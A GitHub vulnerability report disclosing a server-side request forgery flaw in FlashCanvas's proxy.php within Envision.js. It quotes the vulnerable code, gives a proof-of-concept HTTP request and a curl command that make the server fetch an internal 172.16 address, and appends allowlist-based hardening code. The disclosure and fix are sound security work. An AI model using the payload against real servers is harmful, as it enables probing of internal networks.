
[Vuln] SSRF vulnerability in readfile Function of proxy.php File (Envision.js latest version) #37

Open
zer0yu opened this issue May 25, 2022 · 0 comments

zer0yu commented May 25, 2022

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

Impact version: latest
Test with PHP 7.2

The vulnerable code is located in the readfile function of the lib/FlashCanvas/bin/proxy.php file, which does not perform sufficient checking of the url parameter, resulting in a taint introduced from the $_GET['url'] variable. When the extension_loaded('curl') condition is not met, it enters the taint function readfile, which then sends a request to the URL specified by the url parameter, eventually leading to an SSRF vulnerability.

......
$url = str_replace($search, $replace, $_GET['url']);

// Disable compression
header('Content-Encoding: none');

// Load and output the file
if (extension_loaded('curl')) {
    // Use cURL extension
    $ch = curl_init($url);
    curl_exec($ch);
    curl_close($ch);
} else {
    // Use the http:// wrapper
    readfile($url);
}
......

Because the url parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows:

GET /proxy.php?url=http://172.16.119.1/proxypoc HTTP/1.1
Host: 172.16.119.1
Referer: #/flash123canvas.swf
Connection: close

You can also use the following curl command to verify the vulnerability:

curl -i -s -k -X $'GET' \
    -H $'Host: 172.16.119.1:81' -H $'Referer: #/flash123canvas.swf' -H $'Connection: close' \
    $'http://172.16.119.1:81/proxy.php?url=http://172.16.119.1/readfilepoc'

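For comparison, an added example (not FlashCanvas or Envision.js code) of how the unrestricted `readfile($url)` / `curl_exec` branch quoted above can be hardened: the url parameter is only accepted for http/https, for a hostname on an explicit allowlist, and only if that name resolves to a public address, and cURL is told not to follow redirects. The allowlist contents and the sample URLs are constructed for the demonstration.

```php
<?php
// Added example, not the project's proxy.php. Replaces the unchecked
// readfile($url)/curl_exec($ch) branch with allowlist-based validation.
declare(strict_types=1);

/** Return the URL if it is an acceptable proxy target, otherwise null. */
function validate_proxy_target(string $url, array $allowedHosts): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                         // malformed or relative URL
    }
    // Only web schemes; rejects file://, php://, gopher://, dict:// etc.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Exact hostname allowlist rather than a denylist of "internal" names.
    $host = strtolower($parts['host']);
    if (!in_array($host, array_map('strtolower', $allowedHosts), true)) {
        return null;
    }
    // Defence in depth: an allowlisted name must not resolve to a loopback,
    // private or reserved IPv4 address (guards against a bad allowlist entry).
    foreach (gethostbynamel($host) ?: [] as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return null;
        }
    }
    return $url;
}

/** Fetch a validated target; never follow redirects or switch protocols. */
function fetch_proxy_target(string $url)
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,     // a 302 to an internal host would reopen the hole
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $body = curl_exec($ch);                  // string on success, false on failure
    curl_close($ch);
    return $body;
}

if (PHP_SAPI === 'cli') {                    // constructed demo: allowlist and candidate URLs
    $allowed = ['static.example.com'];
    foreach (['http://static.example.com/app.swf', 'http://172.16.119.1/proxypoc'] as $u) {
        printf("%-40s %s\n", $u, validate_proxy_target($u, $allowed) ? 'allowed' : 'refused');
    }
}
```

The resolve-then-fetch sequence is still a time-of-check/time-of-use window (DNS rebinding), so the allowlist, not the IP check, is the primary control; pinning the resolved address with CURLOPT_RESOLVE closes that gap if it matters in your deployment.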
